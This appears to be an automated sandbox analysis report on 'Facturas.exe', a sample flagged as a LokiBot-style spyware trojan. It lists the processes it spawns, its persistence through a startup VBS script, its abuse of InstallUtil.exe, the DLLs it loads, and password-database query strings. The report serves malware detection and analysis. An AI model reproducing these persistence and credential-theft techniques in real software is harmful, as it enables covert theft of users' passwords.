Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Source: C:\Users\user\Desktop\Facturas.exe	Code function: 0_2_02D8B740	0_2_02D8B740
Source: C:\Users\user\Desktop\Facturas.exe	Code function: 0_2_02D8BDD0	0_2_02D8BDD0
Source: C:\Users\user\Desktop\Facturas.exe	Code function: 0_2_0657EBA0	0_2_0657EBA0
Source: C:\Users\user\Desktop\Facturas.exe	Code function: 0_2_06560040	0_2_06560040
Source: C:\Users\user\Desktop\Facturas.exe	Code function: 0_2_06560006	0_2_06560006
Source: C:\Users\user\Desktop\Facturas.exe	Code function: 0_2_0657DF00	0_2_0657DF00
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 13_2_00E1B740	13_2_00E1B740
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 13_2_00E1BDD0	13_2_00E1BDD0
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 13_2_05FFEBA0	13_2_05FFEBA0
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 13_2_05FE0040	13_2_05FE0040
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 13_2_05FE0007	13_2_05FE0007
Source: C:\Users\user\AppData\Roaming\Id.exe	Code function: 13_2_05FFDF00	13_2_05FFDF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_00402BFE	14_2_00402BFE

Source: Facturas.exe, 00000000.00000002.1256345226.0000000003F06000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBvtxvylvl.dll" vs Facturas.exe
Source: Facturas.exe, 00000000.00000002.1247563242.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Facturas.exe
Source: Facturas.exe, 00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefitchering.exe vs Facturas.exe
Source: Facturas.exe, 00000000.00000002.1248872319.0000000003170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Facturas.exe
Source: Facturas.exe, 00000000.00000002.1261777030.0000000005C80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Facturas.exe
Source: Facturas.exe, 00000000.00000002.1248872319.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Facturas.exe
Source: Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Facturas.exe
Source: Facturas.exe, 00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefitchering.exe vs Facturas.exe
Source: Facturas.exe, 00000000.00000002.1259081676.0000000005770000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBvtxvylvl.dll" vs Facturas.exe
Source: Facturas.exe	Binary or memory string: OriginalFilenameAxotmchmc.exe4 vs Facturas.exe

Source: Facturas.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0000000D.00000002.1411737595.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: Facturas.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Id.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Facturas.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Facturas.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Facturas.exe, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Id.exe.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Id.exe.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Id.exe.0.dr, -.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 13.2.Id.exe.3cfd560.3.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 13.2.Id.exe.3cfd560.3.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 13.2.Id.exe.3cfd560.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 13.2.Id.exe.3cfd560.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 13.2.Id.exe.3cfd560.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 13.2.Id.exe.3cfd560.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 13.2.Id.exe.3cfd560.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Facturas.exe.5c80000.8.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 13.2.Id.exe.3cfd560.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: InstallUtil.exe, 00000002.00000002.2479468406.0000000000440000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2479512482.000000000043F000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: \|C@*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp um
Source: Facturas.exe, 00000000.00000002.1256345226.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1256345226.0000000004070000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: D63@D*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbpx<@8
Source: InstallUtil.exe	Binary or memory string: D*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/45@1/1

Source: C:\Users\user\Desktop\Facturas.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs"

Source: Facturas.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Facturas.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Facturas.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe	Binary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
Source: LogabacusPqxXfnFffmMmEflyaway.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Facturas.exe

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\Facturas.exe

File read: C:\Users\user\Desktop\Facturas.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Facturas.exe "C:\Users\user\Desktop\Facturas.exe"
Source: C:\Users\user\Desktop\Facturas.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Id.exe "C:\Users\user\AppData\Roaming\Id.exe"
Source: C:\Users\user\AppData\Roaming\Id.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\Facturas.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Id.exe "C:\Users\user\AppData\Roaming\Id.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Facturas.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cdosys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: inetcomm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: inetres.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
